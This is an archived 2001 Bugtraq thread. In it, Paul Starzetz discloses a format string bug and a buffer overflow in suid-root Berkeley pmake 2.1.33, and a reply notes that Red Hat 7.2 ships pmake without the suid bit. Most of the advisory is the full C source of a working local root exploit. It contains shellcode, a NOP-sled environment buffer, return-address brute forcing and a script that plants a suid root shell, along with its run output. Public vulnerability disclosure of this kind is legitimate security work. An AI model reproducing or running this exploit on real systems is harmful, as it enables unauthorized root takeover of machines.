7548521 2001-11-21 16:20 +0100 /604 rader/ Paul Starzetz <paul@starzetz.de> Sänt av: joel@lysator.liu.se Importerad: 2001-11-22 02:49 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com <bugtraq@securityfocus.com> Extern mottagare: sphilipp@ix.urz.uni-heidelberg.de <sphilipp@ix.urz.uni-heidelberg.de> Mottagare: Bugtraq (import) <19840> Ärende: Advisory: Berkeley pmake ------------------------------------------------------------ From: Paul Starzetz <paul@starzetz.de> To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>, "sphilipp@ix.urz.uni-heidelberg.de" <sphilipp@ix.urz.uni-heidelberg.de> Message-ID: <3BFBC625.371BC65C@starzetz.de> 1. Problem description ---------------------- There is a format string bug in the Berkeley's pmake 2.1.33 and below (parallel make) package as well as a buffer overflow problem. Pmake is suid root on various Linux distributions and uses root privileges for binding to low TCP ports. The ordinary format string bug leads to local root compromise on all vulnerable machines. 2. Details ---------- The vulnerable code can be found in src/job.c at line 720 and looks like: if (! (job->flags & JOB_SILENT) && !shutUp && commandShell->hasEchoCtl) { DBPRINTF ("%s\n", commandShell->echoOff); DBPRINTF (commandShell->errCheck, cmd); shutUp = TRUE; } and in src/str.c line 170: register char *tstr; /* Pointer into tstring */ char tstring[512]; /* Temporary storage for the * current word */ So if the user puts a shell definition into the Makefile, pmake will use errCheck for output formatting which is controllable by the user. The following Makefile demonstrates the format string problem: all: -echo blah .SHELL : path=/bin/sh echo="" quiet="" hasErrCtl=no check=%x%x%x%x%x Putting a long line (>512 characters) in place of the '%x' results in SIGSEGV and possible overwrite of the return address on the stack (a very carefully prepared string is needed). 3. Solution ----------- The patch for the format string bug is obvious. Temporary solution is to remove the suid bit from the binary. 4. Status --------- Vendors informed in July 2001. 5. Exploit ---------- A hole is a hole is a ... only if it is exploitable. The attached C source code will brute force the format string and create a suid shell. There is nothing special about it - the only hard point is to get the write length correctly. Succesfull exploitation looks like: paul@phoenix:~/expl/pmake > ./pm -w+2 ***************************************** * * * pmake local root exploit * * by IhaQueR@IRCnet '2001 * * * ***************************************** * PHASE 1 preparing new environment cleaning preparing shell script allocating pipe stdout/in preparation generating Makefile finished setup * PHASE 2 digging magic string: 0 1 2 3 4 5 6 7 8 9 10 11 12 found mark, parsing output FOUND magic string with pading=0 output length=1446 * PHASE 3 looking for write position: 1 * FOUND * FOUND write position at index=1 creating final makefile creating shell in the environment * PHASE 4 brute force RET: 0xbfff73b0 0xbfff73b4 0xbfff73b8 0xbfff73bc 0xbfff73c0 Paradox, created suid shell at /home/paul/expl/pmake/sush ----------------------------------- pmexpl.c ----------------------------------- /**************************************************************** * * * Pmake <= 2.1.33 local root exploit * * coded by IhaQueR@IRCnet * * compile with gcc -pmexpl-c -o pm * * meet me at HAL '2001 * * * ****************************************************************/ #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/wait.h> #include <string.h> #include <signal.h> #include <stdlib.h> // some definitions #define TARGET "/usr/bin/pmake" #define MKFILE "Makefile" #define MKMSH "./mkmsh" #define TMPLEN 256 #define USERSTACK 0xc0000000u #define NN "\E[m" #define GR "\E[32m" #define RD "\E[31m" #define BL "\E[34m" #define BD "\E[1m" #define FL "\E[5m" #define UL "\E[4m" extern char **environ; static const char *banner = "\n" BL"*****************************************\n" "*\t\t\t\t\t*\n" "*\tpmake local root exploit\t*\n" "*\tby "FL"IhaQueR@IRCnet"NN BL" '2001\t\t*\n" "*\t\t\t\t\t*\n" "*****************************************\n" "\n"NN; static const char *usage = "\n" UL"USAGE:"NN " %s\t-w <wlen delta, try -32,...,32>\n" "\t\t-s <shell addr>\n" "\t\t-a <ret addr 0xbfff73c0 for orig SuSE 7.1 and pmake 2.1.33>\n" "\t\t-m <attempts>\n" "\t\t-p <%%g preload>\n" "\n"; static const char *mkfile = "all:\n\t-echo blah\n\n.SHELL : path=/bin/sh echo=\"\" quiet=\"\" hasErrCtl=no check="; // setresuid(0,0,0) shellcode static char hellcode[]= "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\xb0\xa4\xcd\x80" "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./mkmsh"; // our suid shell maker static char mkmsh[] = "#!/bin/bash\n" "cat <<__DUPA__>sush.c\n" "#include <stdio.h>\n" "#include <unistd.h>\n" "main() {setuid(geteuid()); execl(\"/bin/bash\", \"/bin/bash\", NULL);}\n" "__DUPA__\n" "gcc sush.c -o sush >/dev/null 2>&1\n" "chown 0.0 sush\n" "chmod u+s sush\n"; static char *fromenv[] = { "TERM", "HOME", "PATH" }; #define numenv (sizeof(fromenv)/sizeof(char*)+2) static char *myenv[numenv]; static char eb[numenv][TMPLEN]; int cn=0; void child_kill(int v) { cn--; } int do_fork() { cn++; return fork(); } int main(int ac, char** av) { int pd[2], fd, mk, i, j, res, pid, cnt, flip, mx, wdel; unsigned *up, pad, wlen, shadr, wadr, len1, old, idx, gprel; unsigned char *ptr; char buf[16384]; char buf2[16384]; char aaaa[1024*32]; char head[64]; struct stat sb; fd_set rs; // setup defaults // shell address is calculated from user stack location and the big nop buffer...should work :-/ shadr = USERSTACK - sizeof(aaaa)/2; wadr = 0xbfff73b0; mx = 512; gprel=150; wdel=0; setpgrp(); setsid(); printf(banner); // parse options if(ac!=1) { res = getopt(ac, av, "hw:s:a:m:p:"); while(res!=-1) { switch(res) { case 'w' : wdel = atoi(optarg); break; case 's' : sscanf(optarg, "%x", &shadr); break; case 'a' : sscanf(optarg, "%x", &wadr); break; case 'm' : sscanf(optarg, "%d", &mx); break; case 'p' : sscanf(optarg, "%d", &gprel); if(gprel==0) gprel=1; break; case 'h' : default : printf(usage, av[0]); exit(0); break; } res = getopt(ac, av, "hw:s:a:m:p:"); } } // phase 1 : setup printf("\n\n"BD BL"* PHASE 1\n"NN); // prepare environ printf("\n\tpreparing new environment"); memset(aaaa, 'A', sizeof(aaaa)); aaaa[4]='='; up=(unsigned*)(aaaa+5); for(i=0; i<sizeof(aaaa)/sizeof(int)-2; i++) up[i]=0x41424344; aaaa[sizeof(aaaa)-1]=0; len1=strlen(aaaa); // buffer overflow :-) myenv[0]=aaaa; for(i=1; i<numenv-1; i++) { myenv[i]=eb[i-1]; strcpy(eb[i-1], fromenv[i-1]); if(!strchr(fromenv[i-1], '=')) { strcat(eb[i-1], "="); strcat(eb[i-1], getenv(fromenv[i-1])); } } myenv[numenv-1]=NULL; // clean printf("\n\tcleaning"); unlink("LOCK.make"); unlink("sush"); unlink("sush.c"); unlink("mkmsh"); system("rm -rf /tmp/make* >/dev/null 2>&1"); // our suid shell printf("\n\tpreparing shell script"); mk = open(MKMSH, O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU|S_IXGRP|S_IXOTH); if(mk<0) perror("open"), exit(1); write(mk, mkmsh, strlen(mkmsh)); close(mk); // comm pipe printf("\n\tallocating pipe"); res = pipe(pd); if(res<0) perror("pipe"), exit(2); // redirect stdin/out printf("\n\tstdout/in preparation"); res = dup2(pd[1], 2); if(res<0) perror("dup2"), exit(3); fd = open("/dev/null", O_RDWR); if(fd<0) perror("open"), exit(4); // our makefile printf("\n\tgenerating Makefile"); mk = open(MKFILE, O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU); if(mk<0) perror("open"), exit(5); write(mk, mkfile, strlen(mkfile)); for(i=0; i<gprel; i++) write(mk, "%g", 2); fsync(mk); // child killer printf("\n\tfinished setup"); if(signal(SIGCHLD, &child_kill)==SIG_ERR) perror("signal"), exit(6); // phase 2 : dig format string printf("\n\n\n" BD BL "* PHASE 2\n"NN); printf("\n\tdigging magic string:\t"); cnt=0; while(1) { lseek(mk, -2, SEEK_CUR); write(mk, "%g%x", 4); fsync(mk); usleep(1); pid = do_fork(); // get child output if(pid) { printf("%4d ", cnt); fflush(stdout); do { bzero(buf, sizeof(buf)); res = read(pd[0], buf, sizeof(buf)-1); if(res > 128) { break; } } while(1); kill(SIGTERM, pid); usleep(1); waitpid(pid, NULL, WUNTRACED); bzero(buf2, sizeof(buf2)); read(pd[0], buf2, sizeof(buf2)-1); if(waitpid(pid, NULL, WUNTRACED|WNOHANG)>0) read(pd[0], buf2, sizeof(buf2)-1); // look for padding pad=-1; if(strstr(buf, "41424344")) { pad=0; } else if(strstr(buf, "42434441")) { pad=1; } else if(strstr(buf, "43444142")) { pad=2; } else if(strstr(buf, "44414243")) { pad=3; } // if got the mark parse output for final string if(pad!=-1) { printf("\n\tfound mark, parsing output"); ptr = strtok(buf, "\t\n "); while(ptr) { if(strlen(ptr)>64) break; ptr = strtok(NULL, "\t\n "); } // calculate write length -6, -8 hm I'm dunno about the 16? wlen=strlen(ptr)+wdel-16; printf("\n\tFOUND magic string with pading=%d output length=%d", pad, wlen); // PHASE 3 : find write pos in aaaa printf("\n\n\n" BD BL "* PHASE 3\n"NN); printf("\n\tlooking for write position: "); up=(unsigned*)(aaaa+5-pad); cnt=0; for(i=1; i<sizeof(aaaa)/sizeof(int)-1; i++) { old=up[i]; up[i]=0xabcdef67; printf("%4d ", i); sprintf(head, "%x", up[i]); fflush(stdout); if(cn) read(pd[0], buf2, sizeof(buf2)-1); pid = do_fork(); if(pid) { do { bzero(buf, sizeof(buf)); FD_ZERO(&rs); FD_SET(pd[0], &rs); select(pd[0]+1, &rs, NULL, NULL, NULL); res = read(pd[0], buf, sizeof(buf)-1); if(res > 128) { break; } } while(1); kill(SIGTERM, pid); usleep(1); read(pd[0], buf2, sizeof(buf2)-1); // up[i] is now the place for the beginning of our address field if(strstr(buf, head)) { printf(" * FOUND *"); fflush(stdout); up[i]=old; idx=i; printf("\n\tFOUND write position at index=%d", i); up[i]=old; ptr = strtok(buf, "\t\n "); while(ptr) { if(strlen(ptr)>64) break; ptr = strtok(NULL, "\t\n "); } // construct write 'head': printf("\n\tcreating final makefile"); fflush(stdout); lseek(mk, -2, SEEK_CUR); ptr = (unsigned char*)&shadr; for(j=0; j<4; j++) { flip = (((int)256) + ((int)ptr[j])) - ((int)(wlen % 256u)); wlen = wlen + flip; sprintf(head+j*8, "%%%04dx%%n", flip); } head[32] = 0; write(mk, head, strlen(head)); // brute force RET on the stack upon success printf("\n\tcreating shell in the environment"); // create env shell ptr = (unsigned char*)&(up[i+2*10]); while(ptr<(unsigned char*)(aaaa+sizeof(aaaa)-4)) { *ptr=0x90; ptr++; } strncpy(aaaa+sizeof(aaaa)-strlen(hellcode)-1, hellcode, strlen(hellcode)); aaaa[sizeof(aaaa)-1]=0; if(len1!=strlen(aaaa)) { printf(BD RD"\nERROR: len changed!\n"NN); exit(7); } // phase 4: brute force printf("\n\n\n"BD BL"* PHASE 4\n"NN); printf("\n\tbrute force RET:\t"); fflush(stdout); cnt=0; while(cnt<mx) { for(j=0; j<4; j++) { up[idx+2*j] = wadr + j%4; up[idx+2*j+1] = wadr + j%4; } pid = do_fork(); if(pid) { printf(" 0x%.8x", wadr); fflush(stdout); waitpid(pid, NULL, WUNTRACED); res = stat("sush", &sb); if(!res && sb.st_uid==0) { printf(BD GR"\n\nParadox, created suid shell at %s/sush\n\n"NN, getcwd(buf, sizeof(buf)-1)); system("rm -rf /tmp/make* >/dev/null 2>&1"); exit(0); } } else { res = dup2(fd, 1); if(res<0) perror("dup2"), exit(8); res = dup2(fd, 2); if(res<0) perror("dup2"), exit(9); execle(TARGET, TARGET, "-X", "-dj", NULL, myenv); _exit(10); } if(cnt%8==7) printf("\n\t\t\t\t"); cnt++; wadr += 4; } // failure printf(BD RD"\nFAILED :-("NN); system("rm -rf /tmp/make* >/dev/null 2>&1"); exit(11); } } else { res = dup2(fd, 1); if(res<0) perror("dup2"), exit(12); execle(TARGET, TARGET, "-X", "-dj", NULL, myenv); exit(13); } up[i]=old; waitpid(pid, NULL, WUNTRACED); } printf(BD RD"\n\tstrange error, write pos not found!\n"NN); system("rm -rf /tmp/make* >/dev/null 2>&1"); exit(14); ptr = strtok(buf, "\n"); while(ptr) { printf("\nLINE [%s]", ptr); ptr = strtok(NULL, "\n"); } exit(15); } // start target and read output } else { res = dup2(fd, 1); if(res<0) perror("dup2"), exit(16); execle(TARGET, TARGET, "-X", "-dj", NULL, myenv); exit(17); } if(cnt%8==7) printf("\n\t\t\t\t"); cnt++; } printf(BD RD"\nFAILED\n"NN); system("rm -rf /tmp/make* >/dev/null 2>&1"); return 0; } (7548521) /Paul Starzetz <paul@starzetz.de>/(Ombruten) 7563387 2001-11-22 09:48 +0100 /32 rader/ Nicolas Gregoire <ngregoire@exaprobe.com> Sänt av: joel@lysator.liu.se Importerad: 2001-11-24 01:06 av Brevbäraren Extern mottagare: Paul Starzetz <paul@starzetz.de> Extern kopiemottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <19866> Ärende: Re: Advisory: Berkeley pmake ------------------------------------------------------------ From: Nicolas Gregoire <ngregoire@exaprobe.com> To: Paul Starzetz <paul@starzetz.de> Cc: bugtraq@securityfocus.com Message-ID: <3bfcbbdb3d00b6e8@mel-rta8.wanadoo.fr> (added by mel-rta8.wanadoo.fr) 21/11/2001 16:20:05, Paul Starzetz <paul@starzetz.de> wrote: >1. Problem description >---------------------- > >There is a format string bug in the Berkeley's pmake 2.1.33 and below >(parallel make) package as well as a buffer overflow problem. Pmake is >suid root on various Linux distributions and uses root privileges for >binding to low TCP ports. The ordinary format string bug leads to local >root compromise on all vulnerable machines. Default RedHat 7.2 not vulnerable : [root@box etc]# more /etc/redhat-release Red Hat Linux release 7.2 (Enigma) [root@box etc]# uname -a Linux box 2.4.9-13 #1 Tue Oct 30 20:11:04 EST 2001 i686 unknown [root@box etc]# ls -l `which pmake` -rwxr-xr-x 1 root root 95708 aoû 21 12:55 /usr/bin/pmake pmake isn't SUID root. Nicolas Grégoire http://www.exaprobe.com (7563387) /Nicolas Gregoire <ngregoire@exaprobe.com>/